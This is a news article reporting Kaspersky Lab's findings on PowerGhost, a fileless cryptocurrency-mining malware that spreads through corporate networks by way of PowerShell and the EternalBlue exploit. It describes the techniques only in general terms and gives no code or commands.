A new malware, aptly named PowerGhost has been detected and it has some unique characteristics that leave the owners of the targeted systems under attack—clueless about when the attack was mounted and how long it stayed on their network.
The key factors that have come to light about PowerGhost are that its primary aim appears to be to run cryptocurrency mining processes on the targeted systems and when the malware developers earn the digital coins, they get automatically credited to their wallets.
The second finding is that whoever is controlling PowerGhost seems to be attacking large companies.
Some Worrying Tendencies
The PowerGhost malware and all details attached to it have been brought to light by a technical team at Kaspersky Lab, the renowned cybersecurity firm.
What they have described in a detailed blog post could send worrying signals to many network administrators in large corporate bodies and other organizations that use hundreds of systems in their networks.
Firstly, this new malware does not use any files to infect the system. Though not entirely a new phenomenon, file-less malware throws a huge challenge to cybersecurity experts and users of the targeted systems alike.
PowerShell script is apparently the tool used by the hacker to gain entry into the system and as there is no process involved of writing the script to the hard disk, the user is unable to detect the malware.
What is worse, in the next step, PowerGhost is able to quickly spread to the other systems within the connected network.
Here, it has been found to be using the Eternal Blue exploit. This ensures the remote hacker is able to run cryptocurrency mining in multiple systems all at once, thereby earning more in terms of the cryptocurrencies mined through the blockchain.
In a setup as described, there could be several systems lying idle, and the use of excessive power by PowerGhost has every chance of going unnoticed.
Crypto Mining Malware Has Overtaken Ransomware
Over the past year or more, cybersecurity experts have indeed observed the trend of increased attacks perpetrated by hackers around the world indulging in cryptocurrency mining on the victims’ systems. The frequency of crypto mining attacks is outnumbering that of ransomware attacks, which used to dominate earlier.
The reasons may not be very difficult to find. The blockchain process for mining of cryptocurrency draws a disproportionate amount of power, and one has to invest in more powerful machines to get the process done faster.
The cost of power in many countries is very high. The deployment of malware, particularly in programs like PowerGhost, therefore gives double benefit to these criminals.
They save the expense at their end and wind up earning more digital currencies than they would have been able to at their end using their own computers.
Kaspersky Lab has reported that specific geographies have been targeted by the hackers using PowerGhost, including Turkey, Brazil, India and Columbia.
PowerGhost Can Be Used for Other Attacks as Well
It is not as if the malware PowerGhost is used by hackers for crypto mining attacks only. There have been cases reported of distributed denial of service or DDoS attacks as well, and the malware has been traced to be PowerGhost.
But in these kinds of attacks, there is evidence of files being written to the hard disk. Experts however feel the technique may be worked upon and a file-less cyberattack will also emerge soon.
Researchers point out that besides PowerGhost, there was the Hide N Seek malware which also exhibited almost similar properties.
The highlight of these malware programs is that they act undetected, which gives them the time needed to stay put in the targeted system, causing even more damage than one can imagine and making money without placing any ransom demand.
The computer user community will have to work very closely in collaboration with the cybersecurity specialists in ensuring that the anti-malware firmware programs are developed and installed on their systems to pre-empt any such attacks on their systems.
Seemingly innocuous malware can end up causing excessive damage to your systems and computer network, and the cost of restoring the systems to their original protected status could be extremely high.